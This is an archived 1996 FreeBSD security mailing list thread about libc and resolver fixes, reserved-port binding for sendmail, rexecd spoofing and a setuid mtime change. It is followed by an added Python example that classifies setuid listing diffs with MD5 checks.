> > Paul From owner-freebsd-security Wed Nov 20 09:51:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA21662 for security-outgoing; Wed, 20 Nov 1996 09:51:38 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-61.rdcy01.pacbell.net [206.170.5.61]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA21647; Wed, 20 Nov 1996 09:51:29 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id JAA20913; Wed, 20 Nov 1996 09:50:09 -0800 (PST) Message-Id: <199611201750.JAA20913@precipice.shockwave.com> To: Tom Fischer cc: FreeBSD Security Officer , freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-reply-to: Your message of "Wed, 20 Nov 1996 09:19:40 GMT." <3292CD2C.41C67EA6@panoramix.rain.fr> Date: Wed, 20 Nov 1996 09:50:09 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk 
From: Tom Fischer
Subject: Re: Serious BIND resolver problem. (fwd)

    Hello,

    "quietly fixed?" I'm not too sure I like the sound of that. I'm running
    2.1.0-Release, installed off the January 1996 cdrom on several systems.
    I've installed all of the patches, etc., that were available on
    ftp://freebsd.org/pub/CERT/patches, and I don't remember anything about
    this problem (apparently, obviously).

We normally do full disclosure on security bug reports, this was an exception.

    My question is: Do I need to do something to my libc library?

Yes.

    As I understand it, 2.1R from the cd is not the same thing as 2.1
    -stable... or am I wrong?

If you're running 2.1R, you've got so many bloody security holes it's not funny. If you allow "untrusted" users on your machine, my advice is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay.

From owner-freebsd-security Wed Nov 20 10:10:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA23621 for security-outgoing; Wed, 20 Nov 1996 10:10:06 -0800 (PST) Received: from panoramix.rain.fr (panoramix.rain.fr [194.51.3.136]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA23608 for ; Wed, 20 Nov 1996 10:10:01 -0800 (PST) Received: from panoramix.rain.fr (localhost [127.0.0.1]) by panoramix.rain.fr (8.8.3/8.8.3) with SMTP id TAA15656; Wed, 20 Nov 1996 19:15:56 +0100 (MET) Message-ID: <32934ADB.15FB7483@panoramix.rain.fr> Date: Wed, 20 Nov 1996 18:15:55 +0000
From: Tom Fischer
X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 2.1.0-RELEASE i386)
MIME-Version: 1.0
To: Paul Traina
CC: freebsd-security@freebsd.org
Subject: Re: Serious BIND resolver problem. (fwd)
References: <199611201750.JAA20913@precipice.shockwave.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello,

Paul Traina warned:

> If you're running 2.1R, you've got so many bloody security holes it's
> not funny. If you allow "untrusted" users on your machine, my advice
> is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay.

Thanks for the advice, but I was hoping to delay this until 2.2R came out (in two months, supposedly). The security holes that I know about, and did something about, are:

mount_union, mount_msdos, man...
suidperl
iijppp
rdist...

Aside from this new libc thing, you're telling me that there are others as well? Is there an easy way to fix the libc problem while I wait for 2.2R?

thanks,
tom
tfischer@rain.fr

From owner-freebsd-security Wed Nov 20 10:23:03 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA24423 for security-outgoing; Wed, 20 Nov 1996 10:23:03 -0800 (PST)
Received: from precipice.shockwave.com (ppp-206-170-5-61.rdcy01.pacbell.net [206.170.5.61]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA24415 for ; Wed, 20 Nov 1996 10:23:00 -0800 (PST)
Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA21077; Wed, 20 Nov 1996 10:22:03 -0800 (PST)
Message-Id: <199611201822.KAA21077@precipice.shockwave.com>
To: Tom Fischer
cc: freebsd-security@freebsd.org
Subject: Re: Serious BIND resolver problem. (fwd)
In-reply-to: Your message of "Wed, 20 Nov 1996 18:15:55 GMT." <32934ADB.15FB7483@panoramix.rain.fr>
Date: Wed, 20 Nov 1996 10:22:03 -0800
From: Paul Traina
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> From: Tom Fischer
> Subject: Re: Serious BIND resolver problem. (fwd)
>
> Hello,
>
> Paul Traina warned:
>
> > If you're running 2.1R, you've got so many bloody security holes it's
> > not funny. If you allow "untrusted" users on your machine, my advice
> > is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay.
>
> thanks for the advice, but I was hoping to delay this until 2.2R came out
> (in two months, supposedly). The security holes that I know about, and
> did something about are:
>
> mount_union, mount_msdos, man...
> suidperl
> iijppp
> rdist...
>
> Aside from this new libc thing, you're telling me that there are others
> as well? Is there an easy way to fix the libc problem while I wait for 2.2R?

Upgrade to 2.1.6's libc.

> thanks,
> tom
> tfischer@rain.fr

From owner-freebsd-security Wed Nov 20 18:40:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA28705 for security-outgoing; Wed, 20 Nov 1996 18:40:41 -0800 (PST)
Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA28681 for ; Wed, 20 Nov 1996 18:40:37 -0800 (PST)
Received: from rover.village.org by mail.crl.com with SMTP id AA28327 (5.65c/IDA-1.5 for ); Wed, 20 Nov 1996 15:58:20 -0800
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vQMSw-00032Z-00; Wed, 20 Nov 1996 16:54:02 -0700
To: Tom Fischer
Subject: Re: Serious BIND resolver problem. (fwd)
Cc: Paul Traina, freebsd-security@freebsd.org
In-Reply-To: Your message of "Wed, 20 Nov 1996 18:15:55 GMT." <32934ADB.15FB7483@panoramix.rain.fr>
References: <32934ADB.15FB7483@panoramix.rain.fr> <199611201750.JAA20913@precipice.shockwave.com>
Date: Wed, 20 Nov 1996 16:54:02 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <32934ADB.15FB7483@panoramix.rain.fr> Tom Fischer writes:
: Aside from this new libc thing, you're telling me that there are
: others as well? Is there an easy way to fix the libc problem
: while I wait for 2.2R?

There are several lpr/lpd overflow problems that have been fixed as well.

Warner

From owner-freebsd-security Thu Nov 21 03:14:12 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA18181 for security-outgoing; Thu, 21 Nov 1996 03:14:12 -0800 (PST)
Received: from al.imforei.apana.org.au (al.imforei.apana.org.au [202.12.89.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA18134 for ; Thu, 21 Nov 1996 03:13:14 -0800 (PST)
Received: (from pjchilds@localhost) by al.imforei.apana.org.au (beBop) id VAA27330; Thu, 21 Nov 1996 21:42:22 +1030 (CST)
Date: Thu, 21 Nov 1996 21:42:22 +1030 (CST)
From: Peter Childs
Message-Id: <199611211112.VAA27330@al.imforei.apana.org.au>
To: newton@communica.com.au (Mark Newton), freebsd-security@freebsd.org
Cc: miff@spam.frisbee.net.au
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
X-Newsreader: TIN [UNIX 1.3 unoff BETA release 961020]
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In article <9611180435.AA17191@communica.com.au> you wrote:
: Michael Smith wrote:
:
: > Mark's sense of warmth is perhaps slightly over-smug,
:
: Have you ever known me to be any different? :-)
:
: > but his point is
: > valid. In fact, if it were possible to be non-root and bind to port 25,
:
: That's a wonderful point: The only reason sendmail needs root to bind to
: port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP
: ports less than 1024 can only be allocated by a privileged user. TCP/IP
: implementations on non-UNIX platforms disagree violently with this
: assumption, which makes the value of this "security" feature rather dubious.
:
: It would be foolish of me to argue to have it changed, though :-)

I'm just doing a little bit of poking and from what I can see all calls to bindresvport() go through bind() to the bind syscall. The bind syscall ends up in in_pcbbind (note pg 444 and 462 4.4BSD daemon book) and this bit does the check and returns EACCES on IPPORT_RESERVED && uid == root.

Could an additional check in here just be used to check that if port requested is 25 and uid == mailmanager's uid then OK it?

Am I missing something, or is this fairly trivial? It "seems" pretty hackish to do it in the kernel but as a "quick fix" would this do the job?

Regards,
Peter

--
Peter Childs --- http://www.imforei.apana.org.au/~pjchilds
Finger pjchilds@al.imforei.apana.org.au for public PGP key
Drag me, drop me, treat me like an object!
From owner-freebsd-security Thu Nov 21 04:25:15 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA21088 for security-outgoing; Thu, 21 Nov 1996 04:25:15 -0800 (PST)
Received: from lovely.spam.frisbee.net.au (lovely.spam.frisbee.net.au [202.0.75.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA21064 for ; Thu, 21 Nov 1996 04:25:09 -0800 (PST)
Received: from lovely.spam.frisbee.net.au (localhost [127.0.0.1]) by lovely.spam.frisbee.net.au (8.8.2/8.6.12) with SMTP id XAA03688; Thu, 21 Nov 1996 23:01:29 +1030 (CST)
Message-ID: <32944B9F.41C67EA6@spam.frisbee.net.au>
Date: Thu, 21 Nov 1996 23:01:27 +1030
From: michael smith
X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 3.0-CURRENT i386)
MIME-Version: 1.0
To: Peter Childs
CC: Mark Newton, freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <199611211112.VAA27330@al.imforei.apana.org.au>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Peter Childs wrote:
>
> I'm just doing a little bit of poking and from what i can see all
> calls to bindresvport() go through bind() to the bind syscall. The
> bind syscall ends up in in_pcbbind (note pg 444 and 462 4.4BSD daemon
> book) and this bit does the check and returns EACCES on
> IPPORT_RESERVED && uid == root.
>
> Could an additional check in here just be used to check that if port
> requested is 25 and uid == mailmanager's uid then OK it?

That's basically just hardcoding the more generic ideas bandied around earlier. The long-term solution is the "registry" concept, which is not really ready for showtime in any of the models that have been discussed.

> Am I missing something, or is this fairly trivial. It "seems" pretty
> hackish to do it in the kernel but as a "quick fix" would this do the
> job?

You wouldn't get it into the main tree, but as a local modification it'd most likely be effective.

> Peter Childs --- http://www.imforei.apana.org.au/~pjchilds

--
Mike Smith
*BSD hack
Unix hardware collector
The question "why are the fundamental laws of nature mathematical" invites the trivial response "because we define as fundamental those laws which are mathematical".
Paul Davies, _The_Mind_of_God_

From owner-freebsd-security Thu Nov 21 15:59:47 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA27654 for security-outgoing; Thu, 21 Nov 1996 15:59:47 -0800 (PST)
Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA27633 for ; Thu, 21 Nov 1996 15:59:42 -0800 (PST)
Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id KAA12421; Fri, 22 Nov 1996 10:27:39 +1030 (CST)
Received: by communica.com.au (4.1/SMI-4.1) id AA14971; Fri, 22 Nov 96 10:27:20 CDT
From: newton@communica.com.au (Mark Newton)
Message-Id: <9611212357.AA14971@communica.com.au>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: pjchilds@imforei.apana.org.au (Peter Childs)
Date: Fri, 22 Nov 1996 10:27:20 +1030 (CST)
Cc: newton@communica.com.au, freebsd-security@freebsd.org, miff@spam.frisbee.net.au
In-Reply-To: <199611211112.VAA27330@al.imforei.apana.org.au> from "Peter Childs" at Nov 21, 96 09:42:22 pm
X-Mailer: ELM [version 2.4 PL21]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Peter Childs wrote:

> Could an additional check in here just be used to check that if port
> requested is 25 and uid == mailmanager's uid then OK it?

Only if everyone wanted to roll their own patch: There is no mail manager uid on FreeBSD in the standard installation, and there's no reason to think that everyone who added one would use the same id.

That's certainly the right place to put any additional security mechanisms, but I think we need one a bit more generic than that. I like the sysctl idea, but it'd make sysctl -a unwieldy.

There is another way, though: Consider nfs serving -- mountd reads /etc/exports, parses its contents, fills in the relevant fields of a data structure which describes which filesystems are to be exported, and pushes that data structure into the kernel via a system call.

Why not employ a similar mechanism to read a config file which describes which users can bind to which ports and syscalls it into the kernel to fulfil a task similar to what the sysctl idea was attempting to achieve but without the elephantine MIB?

Just an idea...
- mark

---
Mark Newton        Email: newton@communica.com.au
Systems Engineer   Phone: +61-8-8373-2523
Communica Systems  WWW:   http://www.communica.com.au

From owner-freebsd-security Thu Nov 21 18:48:05 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA07784 for security-outgoing; Thu, 21 Nov 1996 18:48:05 -0800 (PST)
Received: from sunfire.ucs.net (root@sunfire.ucs.net [199.224.7.165]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA07744 for ; Thu, 21 Nov 1996 18:47:56 -0800 (PST)
Received: from localhost (afurman@localhost) by sunfire.ucs.net (8.8.3/8.6.12) with SMTP id VAA17686 for ; Thu, 21 Nov 1996 21:43:47 -0500 (EST)
Date: Thu, 21 Nov 1996 21:43:47 -0500 (EST)
From: Adam Furman
To: FREEBSD-SECURITY@freebsd.org
Subject: Change DES to MD5
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I would like to know how I can change from DES passwords over to MD5. I'm running FreeBSD 2.20 snap 080196. Please tell me how I can do this.

Thanks
Adam

Adam Furman
System Administrator of Sunfire.ucs.net
afurman@amf.net
Irc HUB Admin of irc.ucs.net
Mud Admin of sunfire.ucs.net:4000

From owner-freebsd-security Fri Nov 22 01:48:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA09403 for security-outgoing; Fri, 22 Nov 1996 01:48:43 -0800 (PST)
Received: from precipice.shockwave.com (ppp-206-170-5-88.rdcy01.pacbell.net [206.170.5.88]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA09391; Fri, 22 Nov 1996 01:48:29 -0800 (PST)
Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.3/8.7.3) with ESMTP id BAA05167; Fri, 22 Nov 1996 01:47:27 -0800 (PST)
Message-Id: <199611220947.BAA05167@precipice.shockwave.com>
To: cschuber@uumail.gov.bc.ca
cc: security-officer@freebsd.org, freebsd-security@freebsd.org
Subject: Re: Futile rexecd holes
In-reply-to: Your message of "Tue, 19 Nov 1996 07:53:27 PST." <199611191553.HAA00979@cwsys.cwent.com>
Date: Fri, 22 Nov 1996 01:47:27 -0800
From: Paul Traina
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

After some careful analysis of the rexec/rshd "holes" mentioned in the message, I'm convinced there are no security holes that actually need fixing.

Both exploits, even with tcp spoofing, give you nothing more than spoofing directly would do.

Thanks for the notice though,

Paul

From owner-freebsd-security Fri Nov 22 14:23:08 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA21734 for security-outgoing; Fri, 22 Nov 1996 14:23:08 -0800 (PST)
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA21696; Fri, 22 Nov 1996 14:22:13 -0800 (PST)
Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id OAA01872; Fri, 22 Nov 1996 14:22:11 -0800 (PST)
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id IAA13622; Sat, 23 Nov 1996 08:53:49 +1100
From: Julian Assange
Message-Id: <199611222153.IAA13622@suburbia.net>
Subject: Re: Futile rexecd holes
To: pst@shockwave.com (Paul Traina)
Date: Sat, 23 Nov 1996 08:53:48 +1100 (EST)
Cc: cschuber@uumail.gov.bc.ca, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <199611220947.BAA05167@precipice.shockwave.com> from "Paul Traina" at Nov 22, 96 01:47:27 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

>
> After some careful analysis of the rexec/rshd "holes" mentioned in the
> message, I'm convinced there are no security holes that actually need
> fixing.
>
> Both exploits, even with tcp spoofing, give you nothing more than spoofing
> directly would do.
>
> Thanks for the notice though,
>
> Paul

Except you do not need root. It exploits the trust model, where it could not be exploited before.

--
"Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies. The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for our own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_

+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D |
+---------------------+--------------------+----------------------------------+

From owner-freebsd-security Fri Nov 22 22:57:49 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA12694 for security-outgoing; Fri, 22 Nov 1996 22:57:49 -0800 (PST)
Received: from odin.egate.net (odin.egate.net [207.34.206.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id WAA12689 for ; Fri, 22 Nov 1996 22:57:45 -0800 (PST)
Received: (from root@localhost) by odin.egate.net (8.6.12/8.6.12) id BAA07199; Sat, 23 Nov 1996 01:53:59 -0500
Date: Sat, 23 Nov 1996 01:53:59 -0500 (EST)
From: Operator ROOT
To: freebsd-security@freebsd.org
Subject: setuid diff in date/time.. Worry?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I was looking through my daily run and noticed that the date and time on a file had changed. It appears to be identical and I cannot think what would have caused the date to change.. Should I worry?

Paul

---------- Forwarded message ----------
Date: Fri, 22 Nov 1996 02:00:26 -0500

checking setuid files and devices:
odin setuid/device diffs:
71c71
< -r-sr-xr-x  1 uucp  bin  196608 May  5 15:43:04 1996 /usr/libexec/uucp/uucico
---
> -r-sr-xr-x  1 uucp  bin  196608 Nov 21 19:15:51 1996 /usr/libexec/uucp/uucico

checking for uids of 0:
root 0
toor 0

From owner-freebsd-security Sat Nov 23 04:57:31 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA23588 for security-outgoing; Sat, 23 Nov 1996 04:57:31 -0800 (PST)
Received: from arrakis.cs.put.poznan.pl (root@arrakis.cs.put.poznan.pl [150.254.33.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA23581 for ; Sat, 23 Nov 1996 04:57:24 -0800 (PST)
Received: (from piesik@localhost) by arrakis.cs.put.poznan.pl (8.7.5/8.7.3) id NAA18155; Sat, 23 Nov 1996 13:57:10 +0100 (MET)
Date: Sat, 23 Nov 1996 13:57:10 +0100 (MET)
From: Piotr Piesik
Message-Id: <199611231257.NAA18155@arrakis.cs.put.poznan.pl>
To: freebsd-security@FreeBSD.org, root@odin.egate.net
Subject: Re: setuid diff in date/time.. Worry?
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

> I was looking through my daily run and noticed that the date and time on
> a file had changed. It appears to be identical and I cannot think what
> would have caused the date to change.. Should I worry?

I have the same problem on my 2.1.0-R :-(
But md5 checksums are ok..

Piotr

---------------------------------------------------------------
Piotr Piesik, NetWare & Unix system administrator
Institute of Computing Science, Poznan University of Technology
---------------------------------------------------------------

From owner-freebsd-security Sat Nov 23 05:49:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA27083 for security-outgoing; Sat, 23 Nov 1996 05:49:43 -0800 (PST)
Received: from shadow.apana.org.au (bradf@shadow.apana.org.au [202.12.88.82]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA27068 for ; Sat, 23 Nov 1996 05:49:34 -0800 (PST)
Received: (from bradf@localhost) by shadow.apana.org.au (8.6.12/8.6.9) id AAA03723; Sun, 24 Nov 1996 00:48:44 +1100
Date: Sun, 24 Nov 1996 00:48:44 +1100 (EST)
From: bradf
To: Piotr Piesik
cc: freebsd-security@FreeBSD.ORG, root@odin.egate.net
Subject: Re: setuid diff in date/time.. Worry?
In-Reply-To: <199611231257.NAA18155@arrakis.cs.put.poznan.pl>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Could you please have this address removed from your mailing list. This account has been used to hack into commercial systems in Sydney; this information should not have been sent to this user.

This is the admin of Shadow Apana Internet Services.

+--------------------------------------------------------+
| Brad Forschinger - bradf@shadow.apana.org.au           |
| dole bludging, tafe attending, good-for-nuttin         |
+--------------------------------------------------------+

On Sat, 23 Nov 1996, Piotr Piesik wrote:

> > I was looking through my daily run and noticed that the date and time on
> > a file had changed. It appears to be identical and I cannot think what
> > would have caused the date to change.. Should I worry?
>
> I have the same problem on my 2.1.0-R :-(
> But md5 checksums are ok..
>
> Piotr
>
> ---------------------------------------------------------------
> Piotr Piesik, NetWare & Unix system administrator
> Institute of Computing Science, Poznan University of Technology
> ---------------------------------------------------------------
>

From owner-freebsd-security Sat Nov 23 09:31:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA03636 for security-outgoing; Sat, 23 Nov 1996 09:31:21 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA03628 for ; Sat, 23 Nov 1996 09:31:18 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id SAA18132 for ; Sat, 23 Nov 1996 18:31:14 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id SAA02567 for freebsd-security@freebsd.org; Sat, 23 Nov 1996 18:30:46 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id QAA25241; Sat, 23 Nov 1996 16:17:03 +0100 (MET)
Message-ID:
Date: Sat, 23 Nov 1996 16:17:02 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: setuid diff in date/time.. Worry?
References:
X-Mailer: Mutt 0.51
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: ; from Operator ROOT on Nov 23, 1996 01:53:59 -0500
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Operator ROOT:
> I was looking through my daily run and noticed that the date and time on
> a file had changed. It appears to be identical and I cannot think what
> would have caused the date to change.. Should I worry?

I don't think so, especially if the MD5 checksum doesn't change. There was a bug in the VM of 2.1.0 that would cause the kernel to update the date even if the page was not written.

You may want to reinstall the binary from the live file system CD though.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996
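The setuid diff thread above turns on one distinction: an mtime that moved while the file's bytes did not (Ollivier's 2.1.0 VM bug) is not the same finding as a setuid binary whose contents changed. The following is an added example, not part of the list thread and not FreeBSD's own daily security script; it parses two snapshots in the ls-style format of Paul's forwarded report, cross-checks each mtime-only difference against an MD5 digest as Piotr did by hand, and separates benign mtime drift from content, ownership or mode changes. The listing lines, file contents and paths are constructed for the example.

```python
import hashlib
import re
from dataclasses import dataclass

# Constructed snapshots in the daily security run's listing format:
# mode links owner group size mon day time year path.
OLD_LISTING = """\
-r-sr-xr-x  1 uucp  bin   196608 May  5 15:43:04 1996 /usr/libexec/uucp/uucico
-r-sr-xr-x  1 root  bin    24576 May  5 15:43:04 1996 /usr/bin/passwd
-r-sr-xr-x  1 root  bin    32768 May  5 15:43:04 1996 /usr/bin/su
"""
NEW_LISTING = """\
-r-sr-xr-x  1 uucp  bin   196608 Nov 21 19:15:51 1996 /usr/libexec/uucp/uucico
-r-sr-xr-x  1 root  bin    24576 Nov 21 19:15:51 1996 /usr/bin/passwd
-r-sr-xr-x  1 root  wheel  32768 May  5 15:43:04 1996 /usr/bin/su
-r-sr-xr-x  1 root  bin     8192 Nov 22 01:00:00 1996 /usr/local/bin/extra
"""

# Constructed stand-ins for the binaries' bytes; their MD5 plays the role
# of the checksums Piotr compared. uucico: same bytes, new mtime.
# passwd: same size and new mtime, but different bytes.
OLD_CONTENT = {
    "/usr/libexec/uucp/uucico": b"uucico v1",
    "/usr/bin/passwd": b"passwd v1",
    "/usr/bin/su": b"su v1",
}
NEW_CONTENT = {
    "/usr/libexec/uucp/uucico": b"uucico v1",
    "/usr/bin/passwd": b"passwd v2",
    "/usr/bin/su": b"su v1",
    "/usr/local/bin/extra": b"new setuid file",
}

LINE_RE = re.compile(
    r"^(?P<mode>\S{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+\d{4})\s+(?P<path>.+)$"
)


@dataclass(frozen=True)
class Entry:
    mode: str
    owner: str
    group: str
    size: int
    mtime: str
    path: str


def parse_listing(text):
    """Parse ls-style setuid listing lines into {path: Entry}; paths may contain spaces."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unparseable listing line: " + line)
        d = m.groupdict()
        entries[d["path"]] = Entry(d["mode"], d["owner"], d["group"],
                                   int(d["size"]), d["mtime"], d["path"])
    return entries


def digests(contents):
    """MD5 per path, the checksum the thread relies on to confirm contents."""
    return {p: hashlib.md5(b).hexdigest() for p, b in contents.items()}


def classify(old, new, old_md5, new_md5):
    """Return {path: verdict} for every entry that differs between snapshots.
    Only an mtime change with identical mode/owner/group/size AND identical
    MD5 is reported as benign; everything else is a change to investigate."""
    verdicts = {}
    for path in sorted(set(old) | set(new)):
        if path not in old:
            verdicts[path] = "ADDED: new setuid file"
        elif path not in new:
            verdicts[path] = "REMOVED: setuid file gone"
        else:
            o, n = old[path], new[path]
            if (o.mode, o.owner, o.group) != (n.mode, n.owner, n.group):
                verdicts[path] = "CHANGED: mode/owner/group"
            elif o.size != n.size or old_md5.get(path) != new_md5.get(path):
                verdicts[path] = "CHANGED: contents differ"
            elif o.mtime != n.mtime:
                verdicts[path] = "BENIGN: mtime only, contents unchanged"
    return verdicts


def run():
    return classify(parse_listing(OLD_LISTING), parse_listing(NEW_LISTING),
                    digests(OLD_CONTENT), digests(NEW_CONTENT))


if __name__ == "__main__":
    for path, verdict in run().items():
        print(f"{verdict:40} {path}")
```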